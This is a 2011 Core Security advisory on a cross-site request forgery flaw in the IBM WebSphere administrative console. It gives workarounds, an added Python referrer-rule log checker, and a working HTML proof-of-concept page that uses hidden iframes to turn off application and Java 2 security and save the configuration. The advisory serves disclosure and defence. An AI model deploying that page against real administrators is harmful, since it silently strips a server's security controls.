Core Security Technologies - CoreLabs Advisory
Title: IBM WebSphere Application Server Cross-Site Request Forgery
Advisory ID: CORE-2010-1021
Advisory URL: http://www.coresecurity.com/content/IBM-WebSphere-CSRF
Date published: 2011-06-15
Date of last update: 2011-06-15
Vendors contacted: IBM
Release mode: User release
WebSphere is IBM's integration software platform. It includes the entire middleware infrastructure, such as servers, services, and tools, needed to write, run, and monitor 24x7 industrial-strength, on-demand Web applications and cross-platform, cross-product solutions. WebSphere Application Server is the base for the infrastructure; everything else runs on top of it.
The administrative console of IBM WebSphere Application Server is vulnerable to Cross-Site Request Forgery (CSRF) attacks, which can be exploited by remote attackers to force a logged-in administrator to perform unwanted actions on the IBM WebSphere administrative console, by enticing him to visit a malicious web page.
Contact the vendor for a fix. The following are workarounds for this issue.
According to OWASP, CSRF vulnerabilities can be avoided by checking the referrer of the HTTP request and verifying that the request comes from the original site. A potential workaround is thus to set a rule on a Web Application Firewall that checks the referrer of the requests and verifies that all requests to the WebSphere administrative console originate from the same site.
An administrator of the WebSphere administrative console could mitigate the bug by using Firefox with the NoScript add-on, specifically its ABE (Application Boundaries Enforcer) feature. With ABE it is possible to define rules such as the following:
Site *.example.com
Accept from SELF
Deny
This rule applies to *.example.com; it allows all requests made from the same site and blocks all requests directed to *.example.com but generated from any other site, so that Firefox never sends the request to the server. The syntax of the ABE rules is defined here: <http://noscript.net/abe/abe_rules.pdf>
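The referrer rule from the WAF workaround, written out as an added example (not part of the advisory) that doubles as a hunt over constructed access-log lines; CONSOLE_HOST, the log layout and the sample lines are assumptions. The deny_missing switch shows the trade-off such a rule has to make for requests that carry no Referer header at all.

```python
import re
from urllib.parse import urlsplit

# Hostname the administrative console is served from (assumption; adjust to the deployment).
CONSOLE_HOST = "was-admin.example.com"
CONSOLE_PREFIX = "/ibm/console/"

# NCSA combined-format access log line; the constructed sample lines below use this layout.
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')


def referer_verdict(path, referer, deny_missing=True):
    """Emulate the WAF rule: console requests must originate from the console host itself."""
    if not path.startswith(CONSOLE_PREFIX):
        return "allow"  # the rule is scoped to the administrative console only
    if referer in ("", "-"):
        # No Referer: the browser or a privacy proxy stripped it. A strict rule blocks the
        # request (and may break legitimate clients); a lax rule lets it through unchecked.
        return "deny" if deny_missing else "allow"
    if urlsplit(referer).hostname == CONSOLE_HOST:
        return "allow"
    return "deny"  # cross-site origin: exactly the shape of a CSRF-driven request


def flag_cross_site(log_lines, deny_missing=True):
    """Return (client, path, referer) for each console request the rule would reject."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and referer_verdict(m["path"], m["referer"], deny_missing) == "deny":
            flagged.append((m["client"], m["path"], m["referer"]))
    return flagged


# Constructed sample access-log lines (not taken from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jun/2011:10:00:01 +0000] "GET /ibm/console/login.do HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [15/Jun/2011:10:01:10 +0000] "POST /ibm/console/adminSecurityDetail.do HTTP/1.1" 200 812 "https://was-admin.example.com/ibm/console/navigatorCmd.do" "Mozilla/5.0"',
    '10.0.0.5 - - [15/Jun/2011:10:05:42 +0000] "GET /ibm/console/adminSecurityDetail.do?action=Edit&activeAuthMechanism=LTPA HTTP/1.1" 200 812 "http://attacker.invalid/page.html" "Mozilla/5.0"',
    '10.0.0.5 - - [15/Jun/2011:10:05:43 +0000] "GET /ibm/console/syncworkspace.do?saveaction=save&directsave=true HTTP/1.1" 200 233 "http://attacker.invalid/page.html" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Jun/2011:10:06:00 +0000] "GET /app/index.html HTTP/1.1" 200 2048 "http://elsewhere.example.org/" "Mozilla/5.0"',
]
```

With the strict setting the login page hit (no Referer) is flagged alongside the two cross-site console requests; with deny_missing=False only the cross-site pair remains.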
This vulnerability was discovered and researched by Francisco Falcon from Core Security Technologies during Bugweek 2010. Additional research was performed by Alejandro Rodriguez. Publication was coordinated by Carlos Sarraute.
The administrative console (also known as Integrated Solutions Console) of IBM WebSphere Application Server is vulnerable to Cross-Site Request Forgery (CSRF) attacks, which can be exploited by remote attackers to force a logged-in administrator to perform unwanted actions on the IBM WebSphere administrative console, by enticing him to visit a malicious web page.
The administrative console of IBM WebSphere Application Server includes a standard protection mechanism against Cross-Site Request Forgery, which consists of a token included as a hidden field named csrfid on every FORM and sent to the web server in each POST request performed by the web browser. When the web server receives a POST request, it checks that the csrfid token included in the parameters of the POST request matches the anti-CSRF token associated with the current session. If they do not match, IBM WebSphere responds with an "Unauthorized Request" message, thus effectively preventing CSRF.
However, in certain areas of the administrative console, WebSphere fails to check the value of the csrfid token when processing POST requests, even though the csrfid hidden field is included in every FORM, making the application vulnerable to Cross-Site Request Forgery.
The vulnerable areas of the WebSphere administrative console include the Security > Global Security panel and the Save changes to the master configuration feature. This makes it possible for a remote attacker to disable the Application Security and Java 2 Security options, and then to save the changes to the configuration, by tricking an IBM WebSphere administrator who is currently logged in to the administrative console into visiting a malicious web page. Also note that IBM WebSphere 7.0 with Fix Pack 11 did not include a csrfid token for the Save changes to the master configuration feature; Fix Pack 13 introduced it, but it is ignored anyway on the server side when processing a request to save the master configuration.
The following HTML code is a Proof-of-Concept of a specially crafted web page that will leverage the CSRF vulnerability in order to disable the Application Security and Java 2 Security options, if a logged-in administrator visits it:
<html>
<body>
<iframe id="iframe1" style="visibility:hidden"></iframe>
<iframe id="iframe2" style="visibility:hidden"></iframe>
<script>
// The first request disables the "Administrative security" and "Application security" options
document.getElementById("iframe1").src = "https://<ip>:9043/ibm/console/adminSecurityDetail.do?action=Edit&displayActiveUserRegistry=Repositorios+federados&selectUserRegistry=WIM&activeAuthMechanism=LTPA&apply=Aplicar";
// The second request saves the changes in the WebSphere configuration
document.getElementById("iframe2").src = "https://<ip>:9043/ibm/console/syncworkspace.do?saveaction=save&directsave=true";
</script>
</body>
</html>
IBM WebSphere Application Server:
Cross-Site Request Forgery (CSRF)
Application Boundaries Enforcer (ABE)
The author participated in Core Security's Bugweek 2010 as member of the team "Ex Tester fuErTes and Exploit Testers".
Finding bugs and publishing advisories - the Core Security way
IBM WebSphere Reference, Global Security settings:
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://corelabs.coresecurity.com>.
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: <http://www.coresecurity.com>.
The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.